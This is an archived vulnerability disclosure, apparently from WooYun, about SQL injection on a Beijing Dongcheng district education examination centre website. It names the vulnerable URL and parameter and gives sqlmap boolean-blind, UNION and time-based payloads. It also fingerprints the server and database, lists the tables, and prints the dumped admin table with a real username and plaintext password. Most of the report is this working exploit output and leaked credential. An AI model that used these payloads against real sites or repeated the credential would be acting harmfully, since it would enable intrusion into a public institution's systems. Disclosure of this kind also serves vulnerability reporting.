乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-04: 细节已通知厂商并且等待厂商处理中 2013-12-08: 厂商已经确认,细节仅向厂商公开 2013-12-18: 细节向核心白帽子及相关领域专家公开 2013-12-28: 细节向普通白帽子公开 2014-01-07: 细节向实习白帽子公开 2014-01-18: 细节向公众公开
东城区教育考试中心 站点 存在SQL注入漏洞
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=724 AND 5546=5546 Type: UNION query Title: MySQL UNION query (NULL) - 16 columns Payload: id=-1194 UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a656c663a,0x4555445449675a4c6663,0x3a6866783a), NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=724 AND SLEEP(5)---[20:31:11] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17back-end DBMS: MySQL 5.0.11[20:31:11] [INFO] fetching columns for table 'back_admin' in database 'sq_dcks'[20:31:11] [INFO] the SQL query used returns 3 entries[20:31:11] [INFO] retrieved: "[u'uid', u'int(11)']"[20:31:11] [INFO] retrieved: "[u'user', u'varchar(10)']"[20:31:12] [INFO] retrieved: "[u'pass', u'varchar(15)']"[20:31:12] [INFO] fetching entries for table 'back_admin' in database 'sq_dcks'[20:31:12] [INFO] the SQL query used returns 1 entries[20:31:12] [INFO] retrieved: "[u'bonnie20040513', u'1', u'admin']"[20:31:13] [INFO] analyzing table dump for possible password hashesDatabase: sq_dcksTable: back_admin[1 entry]+----------------+-----+-------+| pass | uid | user |+----------------+-----+-------+| bonnie20040513 | 1 | admin |+----------------+-----+-------+
注入点:www.dcks.org.cn/zhongkao/show.php?id=724-----------------------------------------------------------dbname:sq_dckstables:back_adminbmkcheck_keydingdanindex_picksdadminkstdleavewordlinknewsnews_class1news_class2news_class3productproduct_class1product_class2product_class3uploadfileusr_memberxiaoxuematriculatezhongkaoinquirezhongkaomatriculate-----------------------------------------------------------Database: sq_dcksTable: back_admin[1 entry]+----------------+-----+-------+| pass | uid | user |+----------------+-----+-------+| bonnie20040513 | 1 | admin |+----------------+-----+-------+
交给专业的你们!
危害等级:中
漏洞Rank:10
确认时间:2013-12-08 22:40
暂无